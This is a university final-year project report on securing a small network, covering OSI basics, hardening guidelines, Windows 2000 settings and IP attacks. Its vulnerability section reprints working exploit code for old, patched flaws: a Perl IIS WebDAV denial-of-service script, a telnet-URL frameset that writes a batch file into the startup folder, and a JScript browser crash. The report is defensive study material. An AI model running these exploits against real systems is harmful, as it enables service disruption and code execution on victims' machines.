Upload
dangkiet
View
223
Download
7
Embed Size (px)
Citation preview
Faculty of Engineering and Architecture Department of Electrical
And Computer Engineering
Final Year Project report for the 05/06 academic year
Project name: DFNZ 06 Network Security
Project advisor: Dr. Ali Hajj
Team members:
Antoine George Akiki Joseph Melhem Chaoul Jean Kamal Moukarzel
1
List of Figures and Tables .................................................................................................. 4 Abstract............................................................................................................................... 6 Introduction......................................................................................................................... 8 1. A Brief Overview of Networks................................................................................. 10
1.1 Network Symbols ............................................................................................. 10 1.2 Network Components ....................................................................................... 11 1.3 Network Structure............................................................................................. 13 1.4 OSI Model Overview........................................................................................ 14 1.5 Network Devices............................................................................................... 16
1.5.1 Hubs ................................................................................................................. 16 1.5.2 Switches/bridges .............................................................................................. 17 1.5.3 Routers and layer 3 switches ........................................................................... 18
2. Network Security Theory.......................................................................................... 19 2.1 Physical Layer Security .......................................................................................... 19 2.2 Hardware Layer Security ........................................................................................ 20 2.3 Application Layer Security..................................................................................... 21 2.4 Operating System Layer Security ........................................................................... 24
2.4.1 Windows 2000 Vulnerabilities and Solutions ................................................. 25 2.4.2 Increasing windows 2000 and XP security (refer to [7])................................. 29
2.5 Network Layer Security.......................................................................................... 34 2.5.1 TCP/IP – The Language of the Internet (refer to [12]).................................... 35 2.5.2 Attacks against IP (refer to [12]) ..................................................................... 35 2.5.3 IPSEC policy Architecture (refer to [13])........................................................ 38
2.6 Internal Network Security....................................................................................... 39 2.7 Survey of Most Common Threats........................................................................... 41
2.7.1 Attacks Automated by Malicious Codes ......................................................... 41 2.7.2 Hackers Attacks (not automated by malicious codes) ..................................... 48 2.7.3 DoS .................................................................................................................. 51 2.7.4 Social Engineering........................................................................................... 59
3. Our Network Design................................................................................................. 63 3.1 Topology................................................................................................................. 63 3.2 Securing the Perimeter............................................................................................ 64 3.3 Our Network ........................................................................................................... 68
4. Installing the Network .............................................................................................. 69 4.1 Plugging the Network and Creating a Domain....................................................... 70
4.1.1 Setting Up the Linksys Product ....................................................................... 70 4.1.2 Creating the Domain........................................................................................ 71
4.2 Tightening Security................................................................................................. 72 4.2.1 Patches on Windows........................................................................................ 72 4.2.2 Disabling USB ports to Protect Against Flash Drives..................................... 72
4.3 Creating Common and User Files........................................................................... 75 4.4 Scanning the Network and Updating Security........................................................ 75
4.4.1 Linux Tools...................................................................................................... 76 4.4.2 Windows Tools ................................................................................................ 76
4.5 Confusing the Hackers: Honey Pots ....................................................................... 77 4.5.1 What is a Honeypot.......................................................................................... 77
2
4.5.2 Classifications of Honeypots ........................................................................... 78 4.5.3 Review of most popular Honeypots................................................................. 82 4.5.4 Our selection and work .................................................................................... 91
4.6 User Logs................................................................................................................ 96 5. Countering the Attacks ............................................................................................... 106
5.1 First Attack ........................................................................................................... 106 5.2 Second Attack: Physical Attack............................................................................ 116
Conclusion ...................................................................................................................... 118 Reference ........................................................................................................................ 120 Appendix......................................................................................................................... 122
Appendix A................................................................................................................. 122 Appendix B: PortSentry.............................................................................................. 122 Appendix C: Timeline and Budget ............................................................................. 129
3
List of Figures and Tables
Figure 1.1: Networking facilitates the access of information (p11)
Figure 1.2: Hierarchal Structure of a Network (p12)
Figure 1.3: OSI layers (p14)
Figure 1.4: Workstations connected with a hub (p16)
Figure 1.5: devices connected with a switch (p16)
Figure 1.6: Typical connections of a router (p17)
Figure 2.1: A Wider View of Internet-connected Networks (p36)
Figure 3.1: Our Network Design (p41)
Figure 2.1: Classification of malicious code (p43)
Figure 2.3: Main types of viruses (p44)
Figure 2.4 Program File Virus (p46)
Figure 2.5: Logic Bomb (p51)
Figure 2.6: DoS (p52)
Figure 2.7: DDoS Attack (p53)
Figure 2.8: DRDoS (p54)
Figure 2.9 DRDoS Reflection (p55)
Figure 2.10: TCP 3 way handshake (p57)
Figure 2.11: Smurf Attack (p57)
Figure 3.1: Network Topologies (p62)
Figure 3.2: Our Network Design (p67)
Figure 4.1: Back Officer Friendly Detective (p79)
Figure 4.2: BOF screen capture showing spoofed services (p82)
4
Figure 4.3: BOF warnings (p82)
Figure 4.4: Specter GUI (p85)
Figure 4.5: A possible deployment of Decoy Server (p87)
Figure 4.6: Honeynet Architecture (p89)
Figure 4.7: Server application output format (p101)
Table 1.1: Network Symbol (p10)
5
Abstract Network security is a rising issue in all major businesses due to the increase in
sophistication and abundance of security breaches over the past decade. This is why
Deloitte & Touch, a major international auditing firm, proposed to AUB that a group of
graduating computer engineers work on the network security issue as the topic for their
Final Year Project. In this sense, preliminary meetings were arranged by Prof. Kayssi
(ECE Department Chairperson), and held with Mr. Saad Majari, an AUB graduate now
working for Deloitte’s IT department, so that we could be introduced to the company and
its interests concerning network security.
During these meetings, we agreed that two groups of three students each would work on
the topic. The two groups’ supervisor would be Prof. Ali el-Hajj, from the ECE
department. It was also decided that our group would handle setting up a network and
assuring it is secured in all ways possible. The other group of three would therefore have
the task to hack in our network, from the outside but also from the inside, in order to pin
point our network’s weaknesses. The output of this project would be proper
documentation relating all the steps taken to secure the network and dealing with the
attacks.
During the first stage of our Final Year Project, we performed an in depth literature
survey in order to get more acquainted with the subject. Reading material was provided
to us by Mr. Awad, Mr. Majari and by Mr. Brouwer, from Deloitte, in addition to white
papers and documents we found on the internet.
6
The material found relevant to our project is included in this report. Covered topics range
from: network specification and topology, overview of past and occurring security
breaches, security strategies for the different network layers, possible attacks, etc...
With these in depth information, we were able to set up our network in the second stage
of our FYP, and secure it by implementing the security strategies. We were given four
computers equipped with Pentium 2 processors. We thus installed one Windows 2000
server, one Windows 2000 workstation, one Fedora Server and one Fedora Workstation.
Finally, the third and final stage of our FYP was the “attacks” stage. The hackers’ team
attempted to attack our network externally and internally. A full list of documentation is
included in this report.
7
Introduction Our Final Year Project (FYP), entitled ‘Dfnz06’, is a project involving network security
and attacks. Throughout the academic year, two teams will challenge each others, one
being the security team (our team) and one being the hacking team. The project was
proposed and will be supervised by Deloitte, in cooperation with Pr. Ali Hajj from the
ECE department.
Security of Networks and information systems in general, is essential to businesses that
need to connect to the internet and keep their data safe. It is also essential within the
business, when employees are given specific roles and privileges, which define what part
of the information they can read and/or write.
In this sense, it is important for a business to build a well-secured Network. In doing so,
many factors are to be taken into consideration, as we are tackling a multi-disciplinary
field, who nonetheless must be treated as a whole [1].
The task that was assigned to us was to build a small network, just as small and medium
size businesses (SMB) would do, and document all the guidelines and steps that were
followed to secure this network. In this way, the resulting document could be used as a
reference for students, faculty, but also professionals wanting to learn about the safe
measures that should be taken in order to have a protected network.
However, it does not stop here. It is common practice amongst engineers to test every
design they do. In the case of our FYP, the testing will be a real life situation. Another
group of students will try to hack in our network, from the outside (by connecting to our
firewall), and from the inside (they will be given an account with limited privileges and
8
will try to bypass it). In this way, not only the steps in designing the network will be
documented, but also the measures to be taken when a breach of security is identified.
This report gives an account of what has been done in our FYP during the whole
2005/2006 academic year.
It starts by given a brief overview of networks, as it is essential to fully understand the
way a network operates in order to secure it. It then presents what can be regarded as a
literature survey: a summary of all the information relevant to network security design
that we will be using while building the network. As was stated earlier, many factors
should be taken into consideration such as: the physical layer, the hardware layer, the
application layer, the operating system layer and the network layer. It is also important to
know the enemy when trying to defend a network: therefore, a survey of the most
common threats and how they should be dealt with is presented in this report. Moreover,
this report presents our design: the network we built and its specifications (documenting
the steps taken while building). Finally, the last part of this report is a detailed
documentation of the attacks performed by the hackers’ team and the ways by which we
dealt with such attacks.
9
1. A Brief Overview of Networks
This section presents a review of internetworking terminology, such as the Open System
Interconnection (OSI) reference model and how the layers in the OSI operate. Moreover,
this section gives a brief overview of the devices that are used to support different
network requirements.
1.1 Network Symbols
The following symbols will be used throughout this report to illustrate various network
devices. All graphic are courtesy of Cisco Systems.
10
Router
Firewall
Switch
Workstation
Bridge
Server
Hub
Table 1.1: Network Symbols
1.2 Network Components
The primary purpose of Networks is to enable easy access of information regardless of
place, time, and type of computer system [2].
11
Figure 1.1: Networking facilitates the access of information [2] As can be seen in the figure above, the big company network is subdivided into the
following network components:
• The Main Office: everyone in this office in connected via a LAN (Local Area
Network). The company’s servers (and hence vital information) are located and
connected via this same LAN.
• A Branch Office: information from the main office’s server can be accessed
remotely (via a multitude of ways: leased line, Virtual Private Network,
Internet…). In this way, although physically far, the branch office seems part of
the main office’s network.
• A Home Office: Employees can work from their homes, with most likely on-
demand connections to the main office (or even the branch office). In this way, an
12
employee working from home can access information from the company’s servers
and use the network’s resources.
• Mobile Users: These are individuals who connect to the main office’s LAN
wherever they are (by a multitude of means, most likely on-demand connection
using phone lines).
The fact that the main office’s LAN in connected to the internet and to other network
components (like the branch office) makes it important to have a secure design. In this
way, vital information will not fall into the wrong hands and the company’s privacy will
be preserved.
1.3 Network Structure
In general, and in almost every enterprise, networks are structured in a hierarchal way:
Access Layer
Distribution Layer
Core Layer
Figure 1.2: Hierarchal Structure of a Network The access layer of the network, also referred to as the desktop layer, is the point on
which end users are connected to the LAN. In other words, the access layer is any end-
station’s entry point to the network. Sometimes, end users are placed in group according
13
to which resources they need to access the most. Most of the time, when a user needs to
use the printer, or access a server or use the internet; his traffic is directed to the
distribution layer.
The distribution layer, also referred to as the workgroup layer, is the link between the
access layer (hence the users) and the “motorway” [2] of the network, i.e. the core. The
main function of the distribution layer is to perform vital packet manipulation such as:
• Routing,
• Filtering,
• WAN access…
In brief, the distribution layer can be regarded as the policy controller: it determines if
and how packets can access the core. It also determines the fastest way for a user to
access the servers. In any case, once the layer in question decides of the path, it forwards
the request to the core layer.
The main purpose of the core layer, also referred to as the backbone, is to switch traffic
as fast as possible. It also provides quick transport to what is called enterprise services: e-
mail, videoconferencing and most importantly Internet.
1.4 OSI Model Overview
The OSI model is the conceptual framework of how networks are built and operate. As
the figure below illustrates, the OSI model has seven layers:
14
Figure 1.3: OSI layers [2]
The four lower layers define ways for end stations to connect to each others in order to
exchange data. The three upper layers define the way applications (within the end
stations) communicate with each others and with the users. In more details, the roles of
each layer are:
• Application layer: layer at which user interacts with the computer. Protocols at
this layer determine available resources, define communication partners and
synchronize all communication.
• Presentation layer: ensures that information sent by application layer of one end
station will be readable by the application layer of another end station operating
on another system. This is done by encryption for example.
• Session layer: establishes, manages and terminates communication sessions
between presentation layers.
15
• Transport layer: this layer distinguishes between upper layer applications, and
establishes end-to-end connectivity between them. It also defines flow control and
provides reliable or unreliable services for data transfers.
• Network layer: this layer defines the logical source and destination addresses
associated with a specific protocol. It also defines the different paths that exist
through the network and interconnects multiple data links. Note the routers and
layer 3 switches operate at this layer.
• Data-Link layer: this layer defines the physical source and destination addresses,
the network topology. It also supports frame sequencing and flow control. Note
the switches operate at this layer.
• Physical layer: this layer is the most basic of all; it defines the media type,
connector type and signaling type. In other words, this layer specifies the
electrical, mechanical, procedural and functional requirements for activating, de-
activating and maintaining the physical link between end systems. Note that hubs
and bridges operate at this layer.
1.5 Network Devices
1.5.1 Hubs
Hubs operate at the physical layer. This implies that all devices are in the same broadcast
domain and the same collision domain. The devices also share bandwidth. In other words,
devices connected to a hub communicate with each others as if they were on the same
segment. The hub connecting them does not manipulate or view the traffic exchanged.
16
Figure 1.4: Workstations connected with a hub
1.5.2 Switches/bridges
Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment
connected to a port in the switch has its own collision domain, but all segments are in the
same broadcast domain.
The switch hears every frame that crosses a segment and determines whether it has to
copy it to another segment by looking at the destination address and checking in its MAC
table.
Figure 1.5: devices connected with a switch
17
1.5.3 Routers and layer 3 switches
Routers and layer 3 switched operate at the network layer. They can control broadcasts
and multicasts, they determine the optimal path a frame should take, and they manage
traffic. Usually, routers are the networks doorway to the internet or to a bigger WAN.
Internet Other LAN
Figure 1.6: Typical connections of a router
18
2. Network Security Theory
Now that we have a brief, but precise and clear understanding of how a network operates,
it is time to tackle the security aspect. How is a network secured from the outside and
from within? What are the different fields that come into play? All those questions were
answered by our researches. Although we have come across a lot of readings, we hereby
present the information we judged to be the most essential and relevant to our project.
Security is multi-dimensional: it spans through different layers. Throughout this section
we will discuss the security of: the physical, hardware, application, operating system and
network layers. Moreover, this section will give the principle rules and guidelines to
secure a network from the inside.
2.1 Physical Layer Security
Physical security is often viewed as the first line of defense of a system [1]. It forbids the
intruder to access the system physically (to sit and access information on an already
logged in computer).
Applying physical layer security to our FYP gives us the following guidelines:
• A person of our team should always be present whenever a computer is logged in.
Logged in computers should never be left unattended.
• If possible, access to the room where our network is located (Khaled JouJou’s
lab), should be controlled and banned to those who do not have business there.
Moreover, the switch and firewall should not be accessible to members outside
the team. If this is not possible, users should be restricted to log in only on certain
19
systems, whether they be identified by MAC addresses (see further sections) or a
hostname. Security can also be enhanced by allowing them to access only during
certain times for example.
• The team should adopt a clear desk policy: vital documents should be stored on
CDs or USB keys, and should not be kept unattended (lock in drawers, take away
home…).
• A proper inventory of all the equipment we have should be done, and no device or
machine should be unplugged and taken away without a reason.
• Our network should be protected against power failures and climate hazards (this
should not be a problem in Mr. Joujou’s labs).
On a larger enterprise scale, other measure can be taken to increase the physical security
of the system: biometrics can be used for ID purposes, visitors should not be left
unattended, server rooms should be equipped with appropriate monitoring devices
(cameras for example), guarded by appropriately trained personnel, or secured with key-
card access doors.
2.2 Hardware Layer Security
There are two aspects of hardware security, the first one consists of security at the
hardware level in CPUs, and the second one consists of hardware security at the level of
the enterprise and the users [1]. An example of a security issue at the CPU level is the
interrupt handling. The interrupt vector table is a target for hackers that are able to exploit
the system vulnerabilities at the lower level.
As for hardware security at the level of the enterprise, the following guideline should be
implemented in our FYP:
20
• Access to a server or a workstation’s bios should be protected by a password
(which only the administrator knows). In this way, a user will not be able to take
control of the machine in addition to accessing data that he would otherwise not
be able to retrieve (given his privileges).
• Appropriate bios configuration should be done to limit drive boot sequence to the
OS drive. A user should not be able to boot from other drives such as floppies or
CDs. Also, by forcing to workstation to only boot from the OS drive, installation
of software or new operating systems will be denied.
• Configurations of routers and/or switches should be password protected.
On a larger enterprise scale, it is also important to protect the access to printers by a
password. Otherwise, a hacker can change a printer’s configuration and reroute printer
outputs to other destinations (theft of information).
2.3 Application Layer Security
Application layer security is very important since it involves entrance of data [1]. The
application layer consists of software and database development mainly. The threats at
this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are
specific guidelines we will be following to achieve security at this layer.
• Users should be limited to having only one active session with the applications
and the network. In this way, accountability of users is enhanced.
• Users should have identifiable usernames that follow the same pattern for all (ex:
the AUB usernames are composed of the users’ initials). Logs should be entered
in a database and queries can be used to retrieve specific information.
21
• A list of unauthorized software should be established, to prevent users from
installing any undesired, dangerous software (it is recommended to ban user from
installing any software).
• Highly sensitive data should be encrypted before being stored. In this way,
reading or writing such data is more difficult.
• Any software upgrade should be installed in time. However, it is recommended to
test these upgrades and look for any patches that could enhance security.
• Initial passwords should be given to users after being generated in a random way.
• Some password conditions should be set: passwords should not be the same as the
usernames, or the user’s department for example. They should be at least 6 (or 8
in sensitive cases) characters long, and include combinations of letters and
numbers. In this way, guessing of password is almost impossible and cracking
them is a lengthy process for hackers.
• If a user tries to access his account with no results (the password entered is
incorrect), his account should be blocked after 3 trials. Only the administrator
should have the power to unblock the account.
• When the administrator changes the privileges of a user (after a promotion or a
demotion for example), the user should automatically be logged off and asked to
log in again. Moreover, if a user account is deleted, the user should also be logged
of (to prevent this user of doing unnecessary and dangerous operations when in
fact, he’s not allowed to). In this way, user accountability and responsibility is
enforced.
22
• The user profile should be complete and informative. In a company for example,
it should include the department of the user, his ranking, etc. To force the user to
fill in vital information in his profile, some fields should be made obligatory. In
this way, if ever the user’s information is needed, it will be complete and clear
and accountability is thus enforced.
The biggest threat resulting from many applications is their vulnerability to "buffer
overflow" attacks which usually results in the hacker having access to the system with the
rights of whatever user account the application was running under.
The following are some general guidelines related to applications:
• More secure equivalents for insecure applications should be used (ex: ssh
instead of telnet, since telnet is inherently insecure due to the fact that
passwords are transmitted over the wire as clear text).
• Applications should be kept up-to-date with the latest versions. Many
releases are specifically developed to address security issues.
• Ports that an application opens up should be determined and closed if they
are not absolutely necessary.
• The application vendor's Web site should regularly be checked for
information on how to make the application more secure and for any news
items or patches that address newly-discovered security vulnerabilities.
23
• In the case of a Web server, proper programming techniques can ensure
that CGI scripts are secure.
• Also in the case of a Web server, if Web page updates are fairly
infrequent, a floppy disk may be used to "sneaker-net" the updated HTML
files by logging into the console as root, mounting the floppy disk,
copying the files into the DocumentRoot directory, and then unmounting
the floppy. Doing so would eliminate the need to run an ftp server service
and enabling an account for the person who maintains the pages.
2.4 Operating System Layer Security
As will be seen in the next section of this report, the computers we were provided with
have Pentium2 processors. We therefore decided to install Windows2000 on them, since
WindowsXP would be too slow, as well as Fedora. This section aims to present the
vulnerabilities and protection schemas for Windows2000 Operating System and Linux
OS.
Hardening the operating system involves many things that are not only operating system-
specific, but may often vary from one "flavor" of an operating system to another. Typical
steps, whatever the OS, include:
• Disabling all default accounts and groups that are not needed. When an
operating system is installed it sets up quite a few user accounts and
groups by default (like the guest account, or other application accounts).
24
• The startup configuration can be changed so that only necessary services
are running. Many services open TCP/IP "ports" which hackers find when
running port scans against systems. Thus, closing all unnecessary ports by
disabling unnecessary services or application is a common practice.
• Server consoles that are not being used should be logged off. This is of
particular importance for Internet-connected systems.
2.4.1 Windows 2000 Vulnerabilities and Solutions
Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was
published in March 16, 2001. WebDAV contains a flaw in the handling of
unusually long requests, submitting a valid yet unusually long WebDAV 'search'
request could restart the IIS services and possibly cause the server to stop
responding. The following exploit has been provided by Georgi Guninski [4]:
#!/usr/bin/perl use IO::Socket; print f "IIS 5.0 SEARCH\n wait some time\n"; if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #l ength of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml='<?xml version="1.0"?><D:s earchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n"; $l=length($xml); $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent -length: $l\n\n$xml\n\n"; syswrit e($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res;
25
close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 – 128000
Solution :
Microsoft patch Q291845_W2K_SP2_x86_en
http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/
EN-US/Q291845_W2K_SP2_x86_en.EXE
Microsoft IE 5.01/ 5.5 Telnet Client File Overwrite is a vulnerability that was
published on March 09, 2001. Services for Unix 2.0 contains a client side logging
option which records all information exchanged in a telnet session. A
vulnerability exists that could enable a remote user to invoke the telnet client and
execute arbitrary commands on a target machine via IE. This is achieved by
crafting a URL composed of command line parameters to the telnet client, which
would invoke 'telnet.exe'. Telnet would connect to the host and initiate the
logging of session information, access to this file will allow an attacker to write
and execute arbitrary commands which may be executed later.
The following exploit has been provided by Oliver Friedrichs [4]:
telnet:-f%20\ fil e.txt%20host
The following is an example of a malicious HTML message which could cause data that is received
from the destination port on the host "host" to be writt en to the file "fil ename" in the startup di rectory
for all users. If the logged in user has the appropri ate permissions, a bat ch file will be created and
executed upon future authentication.
<html>
26
<frameset rows="100%,*"> <frame src=about:blank> <frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\st artup \start.bat%20host%208000> </frameset> </html> Solution
Microsoft has released a patch which rectifies this issue:
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp
Microsoft Outlook vcard Buffer Overflow is a vulnerability that was published on
February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is
possible for a remote user to execute arbitrary code on a victim's machine. If a
maliciously crafted .vcf file containing malformed data in the 'Birthday' field is
sent as an attachment and executed, the maliciouslyembedded code could be run
on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5].
A solution is also provided by a windows patch:
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp
Windows 2000 EFS Temporary File Retrieval Vulnerability was published on
January 19, 2001. EFS is the encrypted file system package designed to secure
sensitive information. It is included with the Windows 2000 Operating System,
distributed and maintained by Microsoft Corporation. A problem in the package
could allow the recovery of sensitive data encrypted by the EFS. When the file is
selected for encryption and backup copy of the file is moved into the temporary
directory using the file name efs0.tmp. The data from this file is taken and
27
encrypted using EFS, with the backup file being deleted after the encryption
process is performed. However, after the file is encrypted and the file is deleted,
the blocks in the file system are never cleared, thus making it possible for any
user on the local host to access the data of the encrypted file, which falls outside
of the constrains of access control imposed by the Operating System. This makes
it possible for a malicious user to recover sensitive data encrypted by EFS.
Microsoft WINS Domain Controller Spoofing Vulnerability was published on
January 17, 2001. Windows Internet Naming Service (WINS) ships with
Microsoft Windows NT Server. WINS resolves IP addresses with network
computer names in a client to server environment. A distributed database is
updated with an IP address for every machine available on the network.
Unfortunately WINS does not properly verify the registration of domain
controllers. It is possible for a user to modify the entries for a domain controller,
causing the WINS service to redirect requests for the DC to another system. This
can lead to a loss of network functionality for the domain. The DC impersonator
can also be set up to capture username and password hashes passed to it during
login attempts. An exploit has been provided by David Byrne [6], and a
workaround by Paul Schmehl [4].
Microsoft MSHTML.DLL Crash Vulnerability was published on January 15,
2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer
and related applications. It may be possible for an attacker to crash this library
remotely and cause a denial of service with special Jscript code. This bug involves
Jscript's ability to handle multiple window objects. If a window object is deleted
28
after it receives data and then re-initalized, the library will reportedly crash. This
behavior has been attributed to a stack overflow by its discoverer. It is reportedly
not exploitable in any way that may permit an attacker to gain access to the victim
host. The following exploit has been provided by Thor Larholm:
<iframe id=test style="display:none"></iframe> <script> Larholm = {}; // Object literal test.document.open(); // Stream data test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>"); delete Larholm; Larholm = {}; // Crash </script>
2.4.2 Increasing windows 2000 and XP security (refer to [7])
Editing the registry and disabling services can lead to problems. We must backup
before we change any setting and change only one setting at a time.
- Registry settings are edited with a program call regedit32. Click on the Start Menu >
run > type regedt32
Services are turned on and off by the services.msc. Clock on the Start Menu > Run > type
services.msc
Null sessions allow unwanted users to gain access to our computers, they are
opened on NetBios ports 139 and 445. NetBios is Windows' default protocol for "File and
Print Sharing." With automated tools, hackers will gain access to crucial system
information such as accounts and passwords. NULL sessions are a built in
communication share using an anonymous user and a NULL password on the NetBios
port. The easiest way to stop NULL session is by disabling "File and Print Sharing" on
29
all network devices. In order to do so on Windows 2000 go to Control Panel > Network
and Dial-up Connections and select the proper connection.
If these services are required then we will:
- make a registry entry to protect from sending sensitive data through the NetBios
port.
- Open regedt32 from the Run Menu.
- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control >
LSA.
- The key we want to edit is RestrictAnonymous.
- We will change the value to a 1 or 2. A setting of 1 indicates that null
connections are allowed but sensitive data is blocked being sent via the
connection (only option available in NT4). A setting of 2 will disallow any NULL
connections; this may conflict with some 3rd party software. There are a few
hacking tools that will work on a level 1 setting and retrieve information. Reboot
the machine when done.
Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP.
Windows will cascade to port 445 to respond to NULL sessions and other
requests.
Disable SNMP services
30
If null sessions are disabled, another easy way to gain system information is through
public SNMP. SNMP permits the monitoring and managing of a network from a single
workstation or several workstations, called SNMP managers. It's a family of
specifications that provide a means for collecting network management data from the
devices residing in a network. With an SNMP manager, you can query the network's
devices regarding the nature of their functions.
If there are no programs using SNMP, we can disable this service. This is the easiest way
to protect against hacks and free up some memory.
If SNMP access is needed, then we set SNMP not to run in a public mode:
- Open the registry editor.
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ValidCommunities.
- Select Security> Permissions and change them to permit only approved users
access.
There is one more step to disabling public access to SNMP.
- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters >
ExtensionAgents and delete the value that contains the
LANManagerMIB2Agent. Then rename the other entries to update the
sequence, ie. 2, 3 etc. until the sequence begins with a 1.
31
Disable unused services since they take up space and allow hackers to attack
through the ports they leave open. We should disable messenger if not used since they
give the hacker system rights
Local Security Policy Tips: To edit Windows 2000 or XP's Local Security
Policy follow the following path:
- Start > Administration Tools > Local Security Policy. The Local Security editor has the
same feel as the registry editor.
-Always set a password for the Administrator account .
- Set the password to 6 or more characters, Account Policies > Password Policy >
Minimum Password Length.
Ensure passwords use a combination of letters and numbers
To enable this setting enable Account Policies > Password Policy > Password
Must Meet Complexity Requirements.
Enable Account Lockout Period
Account Lockout Duration
Require users to change their passwords
Account Lockout Threshold
Account Lockout Threshold
Account Tips: The more accounts on a computer the more entry points attackers
can try. Default accounts will always get us into trouble because the attacker does not
32
have to guess a user name. We must always disable the guest account if it is not needed.
Their are tools that will allow an attacker to create accounts with Administrative
privileges on an unpatched Windows 2000 system .We must not login as administrator if
we do not need to. Viruses or malicious scripts will try to run programs or modify
registry settings. If the user does not have access to perform these tasks than the
malicious script cannot either.
Terminal Services : 128 bit encryption must be used to avoid packet sniffers.
Change terminal services to log users off. If a session is left open a hacker might enter
that person's session. Another safety measure with terminal services, change the port
from the default port of 3389. If you want to learn how to perform this edit refer to
appendix A. This method will not really stop attacks, just avoid attackers doing a quick
scan or targeting port 3389.
Disable DNS Transfers - If using active directory limits DNS zone transfers.
Attackers are allowed to scan the network and gain information of IP addresses and ports.
While there is no damage to our system by performing these scans, attackers can learn a
lot about your network. To disable go to:
- Start > Programs > Administrative Tools > Computer Management > Services and
Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.
-Add the IP addresses that are on your network. The best option is to disable zone
transfers by unchecking Allow Zone Transfers.
Port Scanners are very useful tools for finding ports open on our system or
network. Here are a couple we might try, SuperScan, NetScanTools Pro, GFI, and NMap.
33
2.5 Network Layer Security
Network Layer Security among mutually trusting hosts is a relatively straightforward
problem to solve. The standard protocol technique, employed in IPSEC, involves
"encapsulating" an encrypted Network Layer packet inside a standard Network packet,
making the encryption transparent to intermediate nodes that must process packet headers
for routing, etc. Outgoing packets are authenticated, encrypted, and encapsulated just
before being sent to the network, and incoming packets are decapsulated, verified, and
decrypted immediately upon receipt. Key management in such a protocol is similarly
straightforward in the simplest case. Two hosts can use any key-agreement protocol to
negotiate keys with one another, and simply use those keys as part of the encapsulating
and decapsulating packet transforms.
In many applications, security at the network later has a number of advantages over
security provided elsewhere in the protocol stack. Network semantics are usually hidden
from applications, which therefore automatically and transparently take advantage of
whatever network layer security services their environment provides. Especially
importantly, the network layer offers a remarkable flexibility not possible at higher- or
lower- abstractions: security can be configured end-to-end (protecting traffic between two
hosts), route-to-route (protecting traffic passing over a particular set of links), edge-to-
edge (protecting traffic as it passes between "trusted" networks via an "untrusted" one),
or in any other configuration in which network nodes can be identified as appropriate
security endpoints.
34
2.5.1 TCP/IP – The Language of the Internet (refer to [12])
TCP/IP (Transport Control Protocol/Internet Protocol) is the ``language'' of the Internet.
Anything that can learn to ``speak TCP/IP'' can connect to the Internet. This is
functionality that occurs at the Network (IP) and Transport (TCP) layers in the ISO/OSI
Reference Model. Consequently, a host that has TCP/IP functionality (such as Unix,
OS/2, MacOS, or Windows NT) can easily support applications (such as Netscape's
Navigator) that uses the network.
As noted, IP is a ``network layer'' protocol. This is the layer that allows the hosts to
actually ``talk'' to each other. Such things as carrying datagrams, mapping the Internet
address (such as 10.2.3.4) to a physical network address (such as 08:00:69:0a:ca:8f), and
routing, which takes care of making sure that all of the devices that have Internet
connectivity can find the way to each other.
2.5.2 Attacks against IP (refer to [12])
A number of attacks against IP are possible. Typically, these exploit the fact that IP does
not perform a robust mechanism for authentication for the source of the packet. This is
not necessarily a weakness by definition , but it is an important point, because it means
that the facility of host authentication has to be provided at a higher layer on the ISO/OSI
Reference Model. Today, applications that require strong host authentication (such as
cryptographic applications) do this at the application layer.
IP Spoofing
This is where one host claims to have the IP address of another. Since many systems
(such as router access control lists) define which packets may and which packets may not
35
pass based on the sender's IP address, this is a useful technique to an attacker: he can
send packets to a host, perhaps causing it to take some sort of action.
Additionally, some applications allow login based on the IP address of the person making
the request (such as the Berkeley r-commands ). These are both good examples how
trusting untrustable layers can provide security that is considered weak.
IP Session Hijacking
This is a relatively sophisticated attack, first described by Steve Bellovin. It is very
dangerous, however, because there are now toolkits available in the underground
community that allow even inexperienced hackers to perform this attack. IP Session
Hijacking is an attack whereby a user's session is taken over, being in the control of the
attacker. If the user was in the middle of email, the attacker is looking at the email, and
then can execute any commands he wishes as the attacked user. The attacked user simply
sees his session dropped, and may simply login again, perhaps not even noticing that the
attacker is still logged in on his account.
For the description of the attack, refer to the large network of networks in Figure 2.1.
36
Figure 2.1: A Wider View of Internet-connected Networks
In this attack, a user on host A is carrying on a session with host G. Perhaps this is a
telnet session, where the user is reading his email, or using a Unix shell account from
home. Somewhere in the network between A and G sits host H . The person on host H
watches the traffic between A and G, and runs a tool which starts to impersonate A to G,
and at the same time tells A to shut up, perhaps trying to convince it that G is no longer
on the net (which might happen in the event of a crash, or major network outage). After a
few seconds of this, if the attack is successful, host H has ``hijacked'' the session of our
user. Anything that the user can do legitimately can now be done by the attacker,
illegitimately. As far as G knows, nothing has happened.
This can be solved by replacing standard telnet-type applications with encrypted versions
of the same thing. In this case, the attacker can still take over the session, but he'll see
only ``gibberish'' because the session is encrypted. The attacker will not have the needed
37
cryptographic key(s) to decrypt the data stream from G, and will, therefore, be unable to
do anything with the session.
2.5.3 IPSEC policy Architecture (refer to [13])
Let us examine the architecture of Network Layer Security more closely, using IPSEC as
a specific example. In this environment, policy must be enforced whenever packets arrive
at or are about to leave a Network Layer endpoint (which could be an end host, a
gateway, a router, or a firewall). When an incoming packet arrives from the network , the
security endpoint first determines the processing it requires:
